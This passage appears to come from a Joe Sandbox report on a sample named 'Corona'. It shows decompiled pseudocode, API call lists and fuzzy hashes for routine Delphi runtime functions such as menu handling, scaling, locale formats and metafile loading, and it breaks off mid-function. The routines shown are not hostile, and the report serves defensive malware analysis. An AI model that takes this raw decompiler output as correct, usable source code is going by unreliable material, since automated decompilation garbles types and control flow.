                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0044959F
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004495AC
                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004495B9
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004495C6
                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004495D3
                                  • EnableMenuItem.USER32 ref: 004495F1
                                  • EnableMenuItem.USER32 ref: 0044960D
                                  Similarity
                                  • API ID: Menu$Delete$EnableItem$System
                                  • String ID:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042E400(intOrPtr* __eax, int __ecx, int __edx) {
                                  				char _t62;
                                  				signed int _t64;
                                  				signed int _t65;
                                  				signed char _t107;
                                  				intOrPtr _t113;
                                  				intOrPtr _t114;
                                  				int _t117;
                                  				intOrPtr* _t118;
                                  				int _t119;
                                  				int* _t121;
                                  
                                  				 *_t121 = __ecx;
                                  				_t117 = __edx;
                                  				_t118 = __eax;
                                  				if(__edx ==  *_t121) {
                                  					L29:
                                  					_t62 =  *0x42e5ac; // 0x0
                                  					 *((char*)(_t118 + 0x98)) = _t62;
                                  					return _t62;
                                  				}
                                  				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                  					_t107 =  *0x42e5a4; // 0x1f
                                  				} else {
                                  					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                  				}
                                  				if((_t107 & 0x00000001) == 0) {
                                  					_t119 =  *(_t118 + 0x40);
                                  				} else {
                                  					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                  				}
                                  				if((_t107 & 0x00000002) == 0) {
                                  					_t121[1] =  *(_t118 + 0x44);
                                  				} else {
                                  					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                  				}
                                  				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                  					_t64 =  *(_t118 + 0x48);
                                  					_t121[2] = _t64;
                                  				} else {
                                  					if((_t107 & 0x00000001) == 0) {
                                  						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                  						_t121[2] = _t64;
                                  					} else {
                                  						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                  						_t121[2] = _t64;
                                  					}
                                  				}
                                  				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                  				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                  					_t121[3] =  *(_t118 + 0x4c);
                                  				} else {
                                  					if(_t65 == 0) {
                                  						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                  					} else {
                                  						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                  					}
                                  				}
                                  				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                  				_t113 =  *0x42e5ac; // 0x0
                                  				if(_t113 != (_t107 &  *0x42e5a8)) {
                                  					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                  				}
                                  				_t114 =  *0x42e5ac; // 0x0
                                  				if(_t114 != (_t107 &  *0x42e5b0)) {
                                  					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                  				}
                                  				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                  					E0041C6CC( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041C6B0( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                  				}
                                  				goto L29;
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E439
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E453
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E481
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E497
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E4CF
                                  • MulDiv.KERNEL32(?,?,?), ref: 0042E4E7
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042E531
                                  • MulDiv.KERNEL32(?,?,0000001F), ref: 0042E55A
                                  • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0042E580
                                    • Part of subcall function 0041C6CC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C6D9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fadb03b94531c26f38039050984049b055dd7f4ae27ba6ba467e8c5d59c1202d
                                  • Instruction ID: c80c4a75473947645a78c850bd0f614a33c9fe372062f709cd52a0b0ed340615
                                  • Opcode Fuzzy Hash: fadb03b94531c26f38039050984049b055dd7f4ae27ba6ba467e8c5d59c1202d
                                  • Instruction Fuzzy Hash: B3516D70304751AFC720EFAAD885B6BB7E8AF49308F44481EB9D5C7352D639E881CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0042F294(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				int _v32;
                                  				int _v36;
                                  				struct HDC__* _t33;
                                  				intOrPtr _t72;
                                  				int _t74;
                                  				intOrPtr _t80;
                                  				int _t83;
                                  				void* _t88;
                                  				int _t89;
                                  				void* _t92;
                                  				void* _t93;
                                  				intOrPtr _t94;
                                  
                                  				_t92 = _t93;
                                  				_t94 = _t93 + 0xffffffe0;
                                  				_v5 = __ecx;
                                  				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
                                  				if(_v5 == 0) {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t88);
                                  				} else {
                                  					_push(__edx);
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					asm("movsd");
                                  					_pop(_t88);
                                  				}
                                  				_v12 = GetDesktopWindow();
                                  				_push(0x402);
                                  				_push(0);
                                  				_t33 = _v12;
                                  				_push(_t33);
                                  				L00406394();
                                  				_v16 = _t33;
                                  				_push(_t92);
                                  				_push(0x42f3af);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t94;
                                  				_v20 = SelectObject(_v16, E0041CC2C( *((intOrPtr*)(_t88 + 0x40))));
                                  				_t89 = _v36;
                                  				_t83 = _v32;
                                  				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
                                  				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
                                  				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
                                  				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
                                  				SelectObject(_v16, _v20);
                                  				_pop(_t80);
                                  				 *[fs:eax] = _t80;
                                  				_push(0x42f3b6);
                                  				_push(_v16);
                                  				_t72 = _v12;
                                  				_push(_t72);
                                  				L004065C4();
                                  				return _t72;
                                  			}

                                  APIs
                                  • GetDesktopWindow.USER32 ref: 0042F2CB
                                  • 72E7ACE0.USER32(?,00000000,00000402), ref: 0042F2DE
                                  • SelectObject.GDI32(?,00000000), ref: 0042F301
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042F327
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042F349
                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0042F368
                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0042F382
                                  • SelectObject.GDI32(?,?), ref: 0042F38F
                                  • 72E7B380.USER32(?,?,0042F3B6,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 0042F3A9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ObjectSelect$B380DesktopWindow
                                  • String ID:
                                  • API String ID: 989747725-0
                                  • Opcode ID: 30aac2b24cc52da349f649fef76a94a90fc29391708bb432762e63a4ea66443f
                                  • Instruction ID: 4a613b6d93d82af4a53242c0728bd10f9a549366231b97f0cec30dfe0cb3774c
                                  • Opcode Fuzzy Hash: 30aac2b24cc52da349f649fef76a94a90fc29391708bb432762e63a4ea66443f
                                  • Instruction Fuzzy Hash: 9E31FB76A00219AFDB00DEEDCC85DAFBBBDEF0A704B414469B504F7241D679AD048BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0040C248(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v44;
                                  				char _v48;
                                  				char _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				void* _t104;
                                  				void* _t111;
                                  				void* _t133;
                                  				intOrPtr _t183;
                                  				intOrPtr _t193;
                                  				intOrPtr _t194;
                                  
                                  				_t191 = __esi;
                                  				_t190 = __edi;
                                  				_t193 = _t194;
                                  				_t133 = 8;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t133 = _t133 - 1;
                                  				} while (_t133 != 0);
                                  				_push(__ebx);
                                  				_push(_t193);
                                  				_push(0x40c513);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t194;
                                  				E0040C0D4();
                                  				E0040AAAC(__ebx, __edi, __esi);
                                  				_t196 =  *0x45274c;
                                  				if( *0x45274c != 0) {
                                  					E0040AC84(__esi, _t196);
                                  				}
                                  				_t132 = GetThreadLocale();
                                  				E0040A9FC(_t43, 0, 0x14,  &_v20);
                                  				E00403EA0(0x452680, _v20);
                                  				E0040A9FC(_t43, 0x40c528, 0x1b,  &_v24);
                                  				 *0x452684 = E00407DB8(0x40c528, 0, _t196);
                                  				E0040A9FC(_t132, 0x40c528, 0x1c,  &_v28);
                                  				 *0x452685 = E00407DB8(0x40c528, 0, _t196);
                                  				 *0x452686 = E0040AA48(_t132, 0x2c, 0xf);
                                  				 *0x452687 = E0040AA48(_t132, 0x2e, 0xe);
                                  				E0040A9FC(_t132, 0x40c528, 0x19,  &_v32);
                                  				 *0x452688 = E00407DB8(0x40c528, 0, _t196);
                                  				 *0x452689 = E0040AA48(_t132, 0x2f, 0x1d);
                                  				E0040A9FC(_t132, "m/d/yy", 0x1f,  &_v40);
                                  				E0040AD34(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                  				E00403EA0(0x45268c, _v36);
                                  				E0040A9FC(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                  				E0040AD34(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                  				E00403EA0(0x452690, _v44);
                                  				 *0x452694 = E0040AA48(_t132, 0x3a, 0x1e);
                                  				E0040A9FC(_t132, 0x40c55c, 0x28,  &_v52);
                                  				E00403EA0(0x452698, _v52);
                                  				E0040A9FC(_t132, 0x40c568, 0x29,  &_v56);
                                  				E00403EA0(0x45269c, _v56);
                                  				E00403E4C( &_v12);
                                  				E00403E4C( &_v16);
                                  				E0040A9FC(_t132, 0x40c528, 0x25,  &_v60);
                                  				_t104 = E00407DB8(0x40c528, 0, _t196);
                                  				_t197 = _t104;
                                  				if(_t104 != 0) {
                                  					E00403EE4( &_v8, 0x40c580);
                                  				} else {
                                  					E00403EE4( &_v8, 0x40c574);
                                  				}
                                  				E0040A9FC(_t132, 0x40c528, 0x23,  &_v64);
                                  				_t111 = E00407DB8(0x40c528, 0, _t197);
                                  				_t198 = _t111;
                                  				if(_t111 == 0) {
                                  					E0040A9FC(_t132, 0x40c528, 0x1005,  &_v68);
                                  					if(E00407DB8(0x40c528, 0, _t198) != 0) {
                                  						E00403EE4( &_v12, 0x40c59c);
                                  					} else {
                                  						E00403EE4( &_v16, 0x40c58c);
                                  					}
                                  				}
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm");
                                  				_push(_v16);
                                  				E004041CC();
                                  				_push(_v12);
                                  				_push(_v8);
                                  				_push(":mm:ss");
                                  				_push(_v16);
                                  				E004041CC();
                                  				 *0x45274e = E0040AA48(_t132, 0x2c, 0xc);
                                  				_pop(_t183);
                                  				 *[fs:eax] = _t183;
                                  				_push(E0040C51A);
                                  				return E00403E70( &_v68, 0x10);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040C513,?,?,00000000,00000000), ref: 0040C27E
                                    • Part of subcall function 0040A9FC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AA1A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Locale$InfoThread
                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                  • API String ID: 4232894706-2493093252
                                  • Opcode ID: bea73afcbf6b0235d83f3af1ff54531422879775edb980b2dac3df2a5b025c31
                                  • Instruction ID: 2efcfbc7ff773226d2e0f8afc23b45353f0357ef44178ef7aa86b0b0e5d41b1d
                                  • Opcode Fuzzy Hash: bea73afcbf6b0235d83f3af1ff54531422879775edb980b2dac3df2a5b025c31
                                  • Instruction Fuzzy Hash: D06184747002489BDB00EBA5DC81A9E77AADF89305F50953BB100BB3C2CA3CED459B5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E0040E774(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                  				char _v260;
                                  				char _v768;
                                  				char _v772;
                                  				short* _v776;
                                  				intOrPtr _v780;
                                  				char _v784;
                                  				signed int _v788;
                                  				signed short* _v792;
                                  				char _v796;
                                  				char _v800;
                                  				intOrPtr* _v804;
                                  				void* __ebp;
                                  				signed char _t47;
                                  				signed int _t54;
                                  				void* _t62;
                                  				intOrPtr* _t73;
                                  				intOrPtr* _t91;
                                  				void* _t93;
                                  				void* _t95;
                                  				void* _t98;
                                  				void* _t99;
                                  				intOrPtr* _t108;
                                  				void* _t112;
                                  				intOrPtr _t113;
                                  				char* _t114;
                                  				void* _t115;
                                  
                                  				_t100 = __ecx;
                                  				_v780 = __ecx;
                                  				_t91 = __edx;
                                  				_v776 = __eax;
                                  				if(( *(__edx + 1) & 0x00000020) == 0) {
                                  					E0040E3A0(0x80070057);
                                  				}
                                  				_t47 =  *_t91;
                                  				if((_t47 & 0x00000fff) != 0xc) {
                                  					_push(_t91);
                                  					_push(_v776);
                                  					L0040D154();
                                  					return E0040E3A0(_v776);
                                  				} else {
                                  					if((_t47 & 0x00000040) == 0) {
                                  						_v792 =  *((intOrPtr*)(_t91 + 8));
                                  					} else {
                                  						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                  					}
                                  					_v788 =  *_v792 & 0x0000ffff;
                                  					_t93 = _v788 - 1;
                                  					if(_t93 < 0) {
                                  						L9:
                                  						_push( &_v772);
                                  						_t54 = _v788;
                                  						_push(_t54);
                                  						_push(0xc);
                                  						L0040D5A8();
                                  						_t113 = _t54;
                                  						if(_t113 == 0) {
                                  							E0040E0F8(_t100);
                                  						}
                                  						E0040E6CC(_v776);
                                  						 *_v776 = 0x200c;
                                  						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                  						_t95 = _v788 - 1;
                                  						if(_t95 < 0) {
                                  							L14:
                                  							_t97 = _v788 - 1;
                                  							if(E0040E6E8(_v788 - 1, _t115) != 0) {
                                  								L0040D5C0();
                                  								E0040E3A0(_v792);
                                  								L0040D5C0();
                                  								E0040E3A0( &_v260);
                                  								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                  							}
                                  							_t62 = E0040E718(_t97, _t115);
                                  						} else {
                                  							_t98 = _t95 + 1;
                                  							_t73 =  &_v768;
                                  							_t108 =  &_v260;
                                  							do {
                                  								 *_t108 =  *_t73;
                                  								_t108 = _t108 + 4;
                                  								_t73 = _t73 + 8;
                                  								_t98 = _t98 - 1;
                                  							} while (_t98 != 0);
                                  							do {
                                  								goto L14;
                                  							} while (_t62 != 0);
                                  							return _t62;
                                  						}
                                  					} else {
                                  						_t99 = _t93 + 1;
                                  						_t112 = 0;
                                  						_t114 =  &_v772;
                                  						do {
                                  							_v804 = _t114;
                                  							_push(_v804 + 4);
                                  							_t18 = _t112 + 1; // 0x1
                                  							_push(_v792);
                                  							L0040D5B0();
                                  							E0040E3A0(_v792);
                                  							_push( &_v784);
                                  							_t21 = _t112 + 1; // 0x1
                                  							_push(_v792);
                                  							L0040D5B8();
                                  							E0040E3A0(_v792);
                                  							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                  							_t112 = _t112 + 1;
                                  							_t114 = _t114 + 8;
                                  							_t99 = _t99 - 1;
                                  						} while (_t99 != 0);
                                  						goto L9;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040E80D
                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040E829
                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040E862
                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040E8DF
                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040E8F8
                                  • VariantCopy.OLEAUT32(?), ref: 0040E92D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                  • String ID:
                                  • API String ID: 351091851-3916222277
                                  • Opcode ID: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction ID: ead547984189fe65d309a8eee5043de62c2013ec8366ddb66fa11907e0112b1b
                                  • Opcode Fuzzy Hash: e097b3cb944edf1d61b756a614b49b7133427e9fd4d59051032893853cdbf4c2
                                  • Instruction Fuzzy Hash: 1151217590022D9BCB25EB5ACC80AD9B3FCAF48304F4445EAF508F7242D6389F958F65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetActiveWindow.USER32 ref: 0044DE23
                                  • GetWindowRect.USER32 ref: 0044DE7D
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0044DEB5
                                  • MessageBoxA.USER32 ref: 0044DEF6
                                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0044DF6C,?,00000000,0044DF65), ref: 0044DF46
                                  • SetActiveWindow.USER32(?,0044DF6C,?,00000000,0044DF65), ref: 0044DF57
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$Active$MessageRect
                                  • String ID: (
                                  • API String ID: 3147912190-3887548279
                                  • Opcode ID: 00bcd1d4bc423b1884a3360468efd05c5725df83d3a06fe31686816660963fd6
                                  • Instruction ID: c8aff1c046ab8109095365b707f686f0f88113327d2826d6a70f216b70fb59e0
                                  • Opcode Fuzzy Hash: 00bcd1d4bc423b1884a3360468efd05c5725df83d3a06fe31686816660963fd6
                                  • Instruction Fuzzy Hash: 6F413F75E00204AFEB00DBE9CD96FAE77F9EB48704F15446AF501EB395D674AD008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0041FA80(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				int _v12;
                                  				BYTE* _v16;
                                  				intOrPtr _v18;
                                  				signed int _v24;
                                  				short _v26;
                                  				short _v28;
                                  				short _v30;
                                  				short _v32;
                                  				char _v38;
                                  				struct tagMETAFILEPICT _v54;
                                  				intOrPtr _v118;
                                  				intOrPtr _v122;
                                  				struct tagENHMETAHEADER _v154;
                                  				intOrPtr _t103;
                                  				intOrPtr _t115;
                                  				struct HENHMETAFILE__* _t119;
                                  				struct HENHMETAFILE__* _t120;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t124;
                                  				void* _t125;
                                  				intOrPtr _t126;
                                  
                                  				_t124 = _t125;
                                  				_t126 = _t125 + 0xffffff68;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t122 = __eax;
                                  				E0041F91C(__eax);
                                  				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
                                  				if(_v38 != 0x9ac6cdd7 || E0041E40C( &_v38) != _v18) {
                                  					E0041D5BC();
                                  				}
                                  				_v12 = _v12 - 0x16;
                                  				_v16 = E004026BC(_v12);
                                  				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                  				 *[fs:eax] = _t126;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x41fbef, _t124);
                                  				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                  				if(_v24 == 0) {
                                  					_v24 = 0x60;
                                  				}
                                  				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                  				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                  				_v54.mm = 8;
                                  				_v54.xExt = 0;
                                  				_v54.yExt = 0;
                                  				_v54.hMF = 0;
                                  				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                  				 *(_t103 + 8) = _t119;
                                  				if(_t119 == 0) {
                                  					E0041D5BC();
                                  				}
                                  				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                  				_v54.mm = 8;
                                  				_v54.xExt = _v122;
                                  				_v54.yExt = _v118;
                                  				_v54.hMF = 0;
                                  				DeleteEnhMetaFile( *(_t103 + 8));
                                  				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                  				 *(_t103 + 8) = _t120;
                                  				if(_t120 == 0) {
                                  					E0041D5BC();
                                  				}
                                  				 *((char*)(_t122 + 0x2c)) = 0;
                                  				_pop(_t115);
                                  				 *[fs:eax] = _t115;
                                  				_push(0x41fbf6);
                                  				return E004026DC(_v16);
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0041FB22
                                  • MulDiv.KERNEL32(?,000009EC,00000000), ref: 0041FB3F
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0041FB6B
                                  • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 0041FB8B
                                  • DeleteEnhMetaFile.GDI32(00000016), ref: 0041FBAC
                                  • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 0041FBBF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileMeta$Bits$DeleteHeader
                                  • String ID: `
                                  • API String ID: 1990453761-2679148245
                                  • Opcode ID: 96213ee27622db648347686e85402db50df7a199058eb07d99711b2c886e866c
                                  • Instruction ID: 9ce931cf43a94e3a35a230facc405f151e3293912c0da2daa12de29306002b4d
                                  • Opcode Fuzzy Hash: 96213ee27622db648347686e85402db50df7a199058eb07d99711b2c886e866c
                                  • Instruction Fuzzy Hash: DB41ED75D04208AFDB00DFA9C485AEEB7F9EF48714F10846AF904EB241E7399D45CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00418EF8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                  				char _v5;
                                  				intOrPtr* _v12;
                                  				long _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _t22;
                                  				char _t29;
                                  				void* _t53;
                                  				intOrPtr _t61;
                                  				intOrPtr* _t62;
                                  				intOrPtr _t63;
                                  				intOrPtr _t66;
                                  				intOrPtr _t67;
                                  				void* _t72;
                                  				void* _t73;
                                  				intOrPtr _t74;
                                  
                                  				_t72 = _t73;
                                  				_t74 = _t73 + 0xffffffec;
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t53 = __eax;
                                  				_t22 = GetCurrentThreadId();
                                  				_t62 =  *0x451128; // 0x452030
                                  				if(_t22 !=  *_t62) {
                                  					_v24 = GetCurrentThreadId();
                                  					_v20 = 0;
                                  					_t61 =  *0x450fc4; // 0x4103a4
                                  					E0040B2B0(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                                  					E00403888();
                                  				}
                                  				if(_t53 <= 0) {
                                  					E00418ED0();
                                  				} else {
                                  					E00418EDC(_t53);
                                  				}
                                  				_v16 = 0;
                                  				_push(0x452868);
                                  				L00405E3C();
                                  				_push(_t72);
                                  				_push(0x419086);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				_v16 = InterlockedExchange( &E004503E8, _v16);
                                  				_push(_t72);
                                  				_push(0x419067);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t74;
                                  				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                                  					_t29 = 0;
                                  				} else {
                                  					_t29 = 1;
                                  				}
                                  				_v5 = _t29;
                                  				if(_v5 == 0) {
                                  					L15:
                                  					_pop(_t63);
                                  					 *[fs:eax] = _t63;
                                  					_push(E0041906E);
